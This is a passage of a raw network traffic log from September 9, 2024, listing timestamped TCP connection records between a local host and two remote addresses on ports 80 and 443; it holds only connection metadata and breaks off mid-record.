                                        Sep 9, 2024 08:55:18.601277113 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:18.601346970 CEST49721443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:18.601608992 CEST49721443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:18.601622105 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:18.642108917 CEST4972080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.075015068 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:19.076679945 CEST49721443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:19.076699018 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:19.218861103 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:19.218976974 CEST44349721188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:19.219048977 CEST49721443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:19.219679117 CEST49721443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:19.223922014 CEST4972080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.225599051 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.228890896 CEST8049720132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:19.228972912 CEST4972080192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.230420113 CEST8049723132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:19.230499029 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.232568026 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:19.237287045 CEST8049723132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:21.121956110 CEST8049723132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:21.123646975 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.123694897 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.123765945 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.124095917 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.124114990 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.173446894 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.579633951 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.581279039 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.581298113 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.713253975 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.713342905 CEST44349724188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:21.713392973 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.713865995 CEST49724443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:21.716948986 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.718267918 CEST4972580192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.722095013 CEST8049723132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:21.722168922 CEST4972380192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.723037004 CEST8049725132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:21.723129034 CEST4972580192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.723191023 CEST4972580192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:21.727931976 CEST8049725132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:23.497507095 CEST8049725132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:23.499212027 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:23.499255896 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:23.499324083 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:23.499625921 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:23.499638081 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:23.548357010 CEST4972580192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:23.975264072 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:23.976938009 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:23.976957083 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:24.112828016 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:24.112929106 CEST44349726188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:24.112987995 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:24.113500118 CEST49726443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:24.117928982 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:24.122826099 CEST8049727132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:24.122936010 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:24.123039961 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:24.128107071 CEST8049727132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:25.702794075 CEST8049727132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:25.704144955 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:25.704178095 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:25.704245090 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:25.704500914 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:25.704516888 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:25.751498938 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:26.167380095 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:26.169081926 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:26.169101000 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:26.308089972 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:26.308163881 CEST44349728188.114.96.3192.168.2.6
                                        Sep 9, 2024 08:55:26.308212996 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:26.309263945 CEST49728443192.168.2.6188.114.96.3
                                        Sep 9, 2024 08:55:26.313462019 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:26.314685106 CEST4972980192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:26.319525957 CEST8049727132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:26.319572926 CEST4972780192.168.2.6132.226.8.169
                                        Sep 9, 2024 08:55:26.319619894 CEST8049729132.226.8.169192.168.2.6
                                        Sep 9, 2024 08:55:26.319683075 CEST4972980